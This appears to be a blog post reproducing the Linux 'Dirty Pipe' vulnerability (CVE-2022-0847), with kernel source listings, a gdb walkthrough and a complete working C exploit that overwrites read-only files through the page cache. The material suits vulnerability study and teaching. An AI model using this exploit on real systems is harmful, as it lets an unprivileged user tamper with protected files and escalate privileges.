[Original] CVE-2022-0847 reproduction
In the Linux kernel's copy_page_to_iter_pipe and push_pipe functions, the flags member of the pipe buffer structure is not properly initialized and may therefore contain stale values. An unprivileged local user can abuse this to write into arbitrary files and thereby escalate privileges.

A pipe is an inter-process communication mechanism provided by the kernel: pipe() returns two file descriptors, one for writing data and one for reading it. It is implemented as a ring (circular queue) of buffers, and an anonymous pipe can only be used between related processes (for example, parent and child). A minimal usage sketch is shown below.
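
For illustration only (this is a minimal sketch of ordinary pipe usage, not part of the vulnerability itself): the parent writes a string into the pipe and the forked child reads it.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

int main(void)
{
    int fds[2];              /* fds[0]: read end, fds[1]: write end */
    char buf[32];

    if (pipe(fds) < 0) {
        perror("pipe");
        return 1;
    }

    if (fork() == 0) {       /* child: reader */
        close(fds[1]);
        ssize_t n = read(fds[0], buf, sizeof(buf) - 1);
        if (n > 0) {
            buf[n] = '\0';
            printf("child read: %s\n", buf);
        }
        _exit(0);
    }

    /* parent: writer */
    close(fds[0]);
    write(fds[1], "hello pipe", strlen("hello pipe"));
    close(fds[1]);
    wait(NULL);
    return 0;
}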

The pipe is represented by struct pipe_inode_info; the full definition is reproduced in the kernel source listings at the end of this post.

bufs is a circular array of pipe_buffer entries; head is the write index, pointing at the head of the ring, and tail is the read index, pointing at its tail.

Each slot in the ring is a struct pipe_buffer (also listed at the end of this post).

Writing data into a pipe goes through pipe_write().

The key behaviour of pipe_write() (full source at the end of this post): if the last occupied pipe_buffer has PIPE_BUF_FLAG_CAN_MERGE set and its page still has room, the new data is appended directly into that page; otherwise a fresh page is allocated for the next slot and, for a normal (non-packetized) pipe, its flags are set to PIPE_BUF_FLAG_CAN_MERGE.

In Linux everything is a file, and much of what the system does boils down to read and write operations; zero-copy techniques exist to make those reads and writes faster.

Files normally live on disk (mechanical or solid-state), and the CPU cannot access data on disk directly: it first has to be read into memory. Because disk I/O is far slower than memory access (DDR4 memory is roughly 500 times faster to read and write than a mechanical hard disk and about 200 times faster than an SSD), the Linux kernel uses the page cache to cache file data, so that not every file read or write has to touch the disk.

When a user reads or writes a file, it is really the file's page cache that is being read or written. A file access is therefore handled in one of two ways: if the relevant page is already in the page cache, the data is copied to or from that cached page directly; if it is not, the kernel first brings the page from disk into the page cache and then completes the operation against the cached page.

If a pipe_buffer is made to point directly at a page-cache page, using that page as the pipe's buffer page, data can be moved between file descriptors in a zero-copy fashion. This is what splice() does; a minimal userspace sketch is shown below.
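
For illustration, a minimal userspace sketch of splice() moving file data into a pipe without copying it through a user buffer; the path /etc/hostname and the length 32 are arbitrary example values.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    int fds[2];
    char buf[64];
    int fd = open("/etc/hostname", O_RDONLY);   /* any readable file */

    if (fd < 0 || pipe(fds) < 0) {
        perror("setup");
        return 1;
    }

    /* The kernel points a pipe_buffer at the file's page-cache page
     * instead of copying the data into an anonymous pipe page. */
    ssize_t n = splice(fd, NULL, fds[1], NULL, 32, 0);
    if (n < 0) {
        perror("splice");
        return 1;
    }

    /* Read it back out of the pipe just to show the bytes arrived. */
    n = read(fds[0], buf, sizeof(buf));
    if (n > 0)
        write(STDOUT_FILENO, buf, (size_t)n);
    return 0;
}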

The source of copy_page_to_iter_pipe(), which implements this on the splice-to-pipe path, is listed at the end of this post. Its key point is the following:

This function never initializes the pipe_buffer's flags field. If the slot at head that it reuses had just been set up by pipe_write(), its flags still contain PIPE_BUF_FLAG_CAN_MERGE. A subsequent call to pipe_write() will then see a mergeable last buffer and append user-controlled data directly into the page-cache page the buffer now points at, which amounts to an arbitrary file write.

copy_page_to_iter_pipe can be reached via splice() when splicing from a file into a pipe. Putting the pieces together, a minimal exploitation sketch follows.
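
Below is a minimal sketch in the spirit of the public Dirty Pipe PoC; it is not necessarily identical to the exp binary used in the reproduction that follows, and the target path, offset and payload are placeholders (chosen to match the ./exp testfile 1 nihao invocation used later). The idea: fill and then drain the pipe so every ring slot keeps PIPE_BUF_FLAG_CAN_MERGE, splice one byte from the target file into the pipe, then write the payload; pipe_write() merges it straight into the file's page-cache page.

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Fill the pipe completely and then drain it, so that every pipe_buffer
 * slot in the ring has been through pipe_write() and therefore carries
 * PIPE_BUF_FLAG_CAN_MERGE; draining does not clear the flag. */
static void prepare_pipe(int p[2])
{
    char buffer[4096];
    unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);

    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(p[1], buffer, n);
        r -= n;
    }
    for (unsigned r = pipe_size; r > 0;) {
        unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(p[0], buffer, n);
        r -= n;
    }
}

int main(void)
{
    const char *path = "testfile";   /* placeholder: file we can only read */
    loff_t offset = 1;               /* placeholder: must not be page-aligned */
    const char *data = "nihao";      /* placeholder payload */
    int p[2];

    int fd = open(path, O_RDONLY);   /* read permission is all we need */
    if (fd < 0 || pipe(p) < 0) {
        perror("setup");
        return 1;
    }
    prepare_pipe(p);

    /* Splice one byte from just before the target offset into the pipe:
     * copy_page_to_iter_pipe() points the pipe_buffer at the file's
     * page-cache page but leaves the stale CAN_MERGE flag in place. */
    loff_t off = offset - 1;
    if (splice(fd, &off, p[1], NULL, 1, 0) < 0) {
        perror("splice");
        return 1;
    }

    /* pipe_write() sees CAN_MERGE on that buffer and appends our data
     * straight into the page-cache page of the read-only file. */
    if (write(p[1], data, strlen(data)) < 0) {
        perror("write");
        return 1;
    }

    puts("payload written to the target file's page cache");
    return 0;
}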

For the environment, simply pull a ready-made setup from Docker Hub: https://hub.docker.com/r/chenaotian/cve-2022-0847

Before starting QEMU, edit the init script in the file system and change setuidgid 0 to setuidgid 1000, so that the shell comes up as an unprivileged user.

After QEMU boots, confirm that testfile is a read-only file.

Attach gdb with the kernel source loaded and set a breakpoint at do_splice, then run ./exp testfile 1 nihao. Once it breaks, set another breakpoint at copy_page_to_iter_pipe, continue, and when it hits, step to the point where the buf is fetched.

Print the value of pipe->bufs[0].

Stepping to the end of the function, bufs[0].page has been replaced with the file's page-cache page, and offset, len and ops have been replaced as well. Inspect pipe->bufs[0] again.

The flags field has not been replaced: it is still 0x10, i.e. PIPE_BUF_FLAG_CAN_MERGE. Set a breakpoint at pipe_write, continue, and when it breaks, run to the point where the buffer is fetched.

The buf backed by the page-cache page is fetched and is about to be written to. Continue: the merge check passes and execution reaches the copy into the page.

Let it run to completion and check the file contents.

The string was written into the read-only file; the reproduction succeeded. For reference, the kernel structures and functions discussed above (struct pipe_inode_info, struct pipe_buffer, pipe_write() and copy_page_to_iter_pipe()) are listed below.

struct pipe_inode_info {
    struct mutex mutex;
    wait_queue_head_t rd_wait, wr_wait;
    unsigned int head;
    unsigned int tail;
    unsigned int max_usage;
    unsigned int ring_size;
#ifdef CONFIG_WATCH_QUEUE
    bool note_loss;
#endif
    unsigned int nr_accounted;
    unsigned int readers;
    unsigned int writers;
    unsigned int files;
    unsigned int r_counter;
    unsigned int w_counter;
    struct page *tmp_page;
    struct fasync_struct *fasync_readers;
    struct fasync_struct *fasync_writers;
    struct pipe_buffer *bufs;
    struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
    struct watch_queue *watch_queue;
#endif
};
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
  ....
  head = pipe->head;
    was_empty = pipe_empty(head, pipe->tail);
    chars = total_len & (PAGE_SIZE-1);
    if (chars && !was_empty) {
        unsigned int mask = pipe->ring_size - 1;
        struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
        int offset = buf->offset + buf->len;
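        /* If the last occupied buffer is mergeable and its page still has
         * room, the new bytes are appended directly into that page. */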
 
        if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
            offset + chars <= PAGE_SIZE) {
            ret = pipe_buf_confirm(pipe, buf);
            if (ret)
                goto out;
 
            ret = copy_page_from_iter(buf->page, offset, chars, from);
            if (unlikely(ret < chars)) {
                ret = -EFAULT;
                goto out;
            }
 
            buf->len += ret;
            if (!iov_iter_count(from))
                goto out;
        }
    }
  for (;;) {
    ....
        if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
            unsigned int mask = pipe->ring_size - 1;
            struct pipe_buffer *buf = &pipe->bufs[head & mask];
            struct page *page = pipe->tmp_page;
            int copied;
 
            if (!page) {
                page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
                if (unlikely(!page)) {
                    ret = ret ? : -ENOMEM;
                    break;
                }
                pipe->tmp_page = page;
            }
 
            /* Allocate a slot in the ring in advance and attach an
             * empty buffer.  If we fault or otherwise fail to use
             * it, either the reader will consume it or it'll still
             * be there for the next write.
             */
            spin_lock_irq(&pipe->rd_wait.lock);
 
            head = pipe->head;
            if (pipe_full(head, pipe->tail, pipe->max_usage)) {
                spin_unlock_irq(&pipe->rd_wait.lock);
                continue;
            }
 
            pipe->head = head + 1;
            spin_unlock_irq(&pipe->rd_wait.lock);
 
            /* Insert it into the buffer array */
            buf = &pipe->bufs[head & mask];
            buf->page = page;
            buf->ops = &anon_pipe_buf_ops;
            buf->offset = 0;
            buf->len = 0;
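            /* A freshly allocated anonymous buffer gets PIPE_BUF_FLAG_CAN_MERGE
             * here; this is the flag that later survives, stale, in
             * copy_page_to_iter_pipe(). */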
            if (is_packetized(filp))
                buf->flags = PIPE_BUF_FLAG_PACKET;
            else
                buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
            pipe->tmp_page = NULL;
    ....
  }
}
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
             struct iov_iter *i)
{
    struct pipe_inode_info *pipe = i->pipe;
    struct pipe_buffer *buf;
    unsigned int p_tail = pipe->tail;
    unsigned int p_mask = pipe->ring_size - 1;
    unsigned int i_head = i->head;
    size_t off;
 
    if (unlikely(bytes > i->count))
        bytes = i->count;
 
    if (unlikely(!bytes))
        return 0;
 
    if (!sanity(i))
        return 0;
 
    off = i->iov_offset;
    buf = &pipe->bufs[i_head & p_mask];
    if (off) {
        if (offset == off && buf->page == page) {
            /* merge with the last one */
            buf->len += bytes;
            i->iov_offset += bytes;
            goto out;
        }
        i_head++;
        buf = &pipe->bufs[i_head & p_mask];
    }
    if (pipe_full(i_head, p_tail, pipe->max_usage))
        return 0;
 
    buf->ops = &page_cache_pipe_buf_ops;
    get_page(page);
    buf->page = page;
    buf->offset = offset;
    buf->len = bytes;
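    /* Note: buf->flags is never written in this function, so a stale
     * PIPE_BUF_FLAG_CAN_MERGE left over from pipe_write() survives even
     * though buf->page now points at a file's page-cache page. */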
 
    pipe->head = i_head + 1;
    i->iov_offset = offset + bytes;
    i->head = i_head;
out:
    i->count -= bytes;
    return bytes;
}